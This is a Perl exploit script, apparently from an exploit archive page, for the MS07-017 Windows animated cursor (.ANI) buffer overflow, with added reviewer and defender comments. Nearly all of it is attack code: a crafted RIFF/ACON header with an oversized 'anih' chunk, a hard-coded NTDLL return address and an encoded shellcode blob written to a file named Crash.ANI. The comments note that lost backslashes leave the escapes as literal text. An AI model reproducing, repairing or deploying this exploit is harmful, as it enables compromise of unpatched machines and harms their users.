
msanimated-overflow.txt

Posted on 16 January 2010

#MS Animated Cursor .ANI BOF (Perl Edition ) (MS07-017)
#Discovered by Alex Sotirov from Determina,So all rights are reserved to him!
#Written by Jacky!
#This exploit is written in Perl , and it's the first MS07-017 exploit ( As i saw ) which be written in perl!
#THIS EXPLOIT IS FOR EDUCATIONAL PURPOSES ONLY !
#
# What the script visibly does: it concatenates four fixed pieces
# (1024 bytes of 'A' filler, a RIFF/ACON animated-cursor header, one
# 32-bit little-endian address, and a byte string the author labels
# shellcode) and writes the result to a file named Crash.ANI. Nothing
# is computed at run time; the whole payload is a constant literal.
#
# NOTE(review): as reproduced on this page every backslash has been
# lost, so "x52x49..." and the trailing "n" in the print strings are
# plain ASCII characters here, not escape sequences. The listing as
# shown therefore does not emit the binary header it names; treat it
# as a text transcript, not as a usable sample or as IoC bytes.
#
# Defender notes: the structure carries the MS07-017 hallmark that
# detection signatures commonly key on -- an "anih" chunk whose
# declared length is not the 36 bytes of a legitimate ANIHEADER (see
# $aniheader below). MS07-017, named in the title, is the Microsoft
# bulletin that shipped the fix; patched systems are the mitigation.
# Code-quality: no strict/warnings, bareword filehandle, 2-arg open
# with an interpolated name, and open/print/close are never checked.

# Output file name, relative to the current working directory.
my $file="Crash.ANI";

# 1024 bytes of filler.
my $junk="A"x1024;

# Animated-cursor container header. Decoding the hex as ASCII:
#   52 49 46 46 = "RIFF", 41 43 4F 4E = "ACON", 61 6E 69 68 = "anih".
# The first "anih" declares length 0x24 (36, the normal ANIHEADER
# size); the trailing "anih" at the very end declares 0x03A8 (936).
# That oversized second header is presumably the part relevant to
# MS07-017 -- the remaining fields are not interpreted here.
my $aniheader="x52x49x46x46x00x04x00x00x41x43x4Fx4Ex61x6Ex69x68".
"x24x00x00x00x24x00x00x00xFFxFFx00x00x0Ax00x00x00".
"x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00".
"x10x00x00x00x01x00x00x00x54x53x49x4Cx03x00x00x00".
"x10x00x00x00x54x53x49x4Cx03x00x00x00x02x02x02x02".
"x61x6Ex69x68xA8x03x00x00";

# pack('V') = unsigned 32-bit little-endian. A single hard-coded
# address; per the author's comment it comes from NTDLL.dll, so it is
# presumably tied to one specific Windows build -- not verifiable here.
my $jmpaddress=pack('V',0x7C941EED); # Address from NTDLL.dll

# Byte string the author labels as shellcode, led by sixteen 0x90
# bytes. What it would do cannot be determined from this listing and
# the author does not document it.
my $shellcode="x90x90x90x90x90x90x90x90x90x90x90x90x90x90x90x90".
"x29xc9x83xe9xafxd9xeexd9x74x24xf4x5bx81x73x13x8f".
"x35x37x85x83xebxfcxe2xf4x73x5fxdcxcax67xccxc8x7a".
"x70x55xbcxe9xabx11xbcxc0xb3xbex4bx80xf7x34xd8x0e".
"xc0x2dxbcxdaxafx34xdcx66xbfx7cxbcxb1x04x34xd9xb4".
"x4fxacx9bx01x4fx41x30x44x45x38x36x47x64xc1x0cxd1".
"xabx1dx42x66x04x6ax13x84x64x53xbcx89xc4xbex68x99".
"x8exdex34xa9x04xbcx5bxa1x93x54xf4xb4x4fx51xbcxc5".
"xbfxbex77x89x04x45x2bx28x04x75x3fxdbxe7xbbx79x8b".
"x63x65xc8x53xbexeex51xd6xe9x5dx04xb7xe7x42x44xb7".
"xd0x61xc8x55xe7xfexdax79xb4x65xc8x53xd0xbcxd2xe3".
"x0exd8x3fx87xdax5fx35x7ax5fx5dxeex8cx7ax98x60x7a".
"x59x66x64xd6xdcx66x74xd6xccx66xc8x55xe9x5dx02x8e".
"xe9x66xbex64x1ax5dx93x9fxffxf2x60x7ax59x5fx27xd4".
"xdaxcaxe7xedx2bx98x19x6cxd8xcaxe1xd6xdaxcaxe7xed".
"x6ax7cxb1xccxd8xcaxe1xd5xdbx61x62x7ax5fxa6x5fx62".
"xf6xf3x4exd2x70xe3x62x7ax5fx53x5dxe1xe9x5dx54xe8".
"x06xd0x5dxd5xd6x1cxfbx0cx68x5fx73x0cx6dx04xf7x76".
"x25xcbx75xa8x71x77x1bx16x02x4fx0fx2ex24x9ex5fxf7".
"x71x86x21x7axfax71xc8x53xd4x62x65xd4xdex64x5dx84".
"xdex64x62xd4x70xe5x5fx28x56x30xf9xd6x70xe3x5dx7a".
"x70x02xc8x55x04x62xcbx06x4bx51xc8x53xddxcaxe7xed".
"xf1xedxd5xf6xdcxcaxe1x7ax5fx35x37x85";

# Fixed concatenation order: filler, header, address, then shellcode.
my $payload=$junk.$aniheader.$jmpaddress.$shellcode;

# Bareword filehandle, 2-arg open with an interpolated name, and no
# `or die` -- a failed open is silent and the prints below still run.
open(INI,">$file");
print INI $payload;
sleep(5);
# As rendered here the trailing "n" is a literal letter (backslash lost).
print "[+]File Created Successfully!n";
print "[+]Written by Jacky!n";
sleep(5);
# Unchecked close; on a write handle this is where buffered write
# errors would surface.
close(INI);

 
